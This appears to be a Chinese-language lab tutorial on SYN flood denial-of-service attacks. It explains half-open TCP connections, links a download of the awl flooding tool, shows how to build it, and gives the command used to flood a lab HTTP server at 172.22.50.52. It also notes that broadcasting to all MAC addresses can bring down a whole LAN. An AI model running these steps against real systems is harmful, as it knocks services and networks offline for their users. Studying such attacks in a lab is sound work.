SYN洪水ATT的過程:
在服務端返回一個確認的SYN-ACK包的時候有個潛在的弊端,如果發起的客戶是一個不存在的客戶端,那麼服務端就不會接到客戶端迴應的ACK包。
這時服務端需要耗費一定的數量的系統內存來等待這個未決的連接,直到等待超關閉,才能施放內存。
如果惡意者通過通過ip欺騙,發送大量SYN包給受害者系統,導致服務端存在大量未決的連接並佔用大量內存和tcp連接,從而導致正常客戶端無法訪問服務端,這就是SYN洪水ATT的過程。
基本過程:從客戶端到服務器
awl0.2下載地址:
https://pan.baidu.com/s/1KeWufWTjQl6cA8xLd_3FVw
提取碼y1x0
開始安裝awl
1.解壓
root:~ # tar xf awl-0.2.tar
root:~ # cd awl-0.2/
root:~/awl-0.2 # ls
acconfig.h AUTHORS config.h.in configure.in include ltmain.sh missing src
acinclude.m4 ChangeLog config.sub COPYING INSTALL Makefile.am NEWS TODO
aclocal.m4 config.guess configure depcomp install-sh Makefile.in README
2.編譯安裝
root:~/awl-0.2 # ./configure --prefix=/app/awl #將全部文件安裝至/app/awl/文件夾下
root:~/awl-0.2 # make -j 4 #以4個進程同時編譯——把源代碼編譯成可執行的二進制文件
root:~/awl-0.2 # make install #安裝
實驗環境
在centos6上有一臺http服務器 ip爲172.22.50.52
服務 器端爲centos7 ip爲172.22.50.51
http服務爲172.22.50.51
服務器(被ATT端)172.22.50.52
雙方都能ping通
開始ATT
通過剛纔ping 52 可用 arp -n 查看ping過的主機mac地址
# arp -nawl參數如下:
-i 發送包的接口,如果省略默認是eth0
-m 指定目標mac地址 注:如果-m沒有指定mac,默認目標MAC地址是“FF.FF.FF.FF.FF.FF”,
FF.FF.FF.FF.FF.FF MAC地址是什麼?
這表示向同一網段內的所有主機發出ARP廣播,進行SYNATT,還容易使整個局域網癱瘓。
-d 被ATT的機器的IP
-p 被ATT的機器的端口
在awl安裝目錄下使用awl(也可將awl文件夾寫入PATH直接使用)
警告:在5秒內按CTLR+C停止
這裏有大量的僞裝ip對52進行訪問
ATT時服務器http服務器已不能訪問
停止後訪問恢復正常
拓展:
./awl -i ens33 -m -d 172.22.50.52 -p 80在-m後不要跟目標mac地址,默認目標MAC地址是“FF.FF.FF.FF.FF.FF”
這表示向同一網段內的所有主機發出ARP廣播,進行SYN ATT,容易使整個局域網癱瘓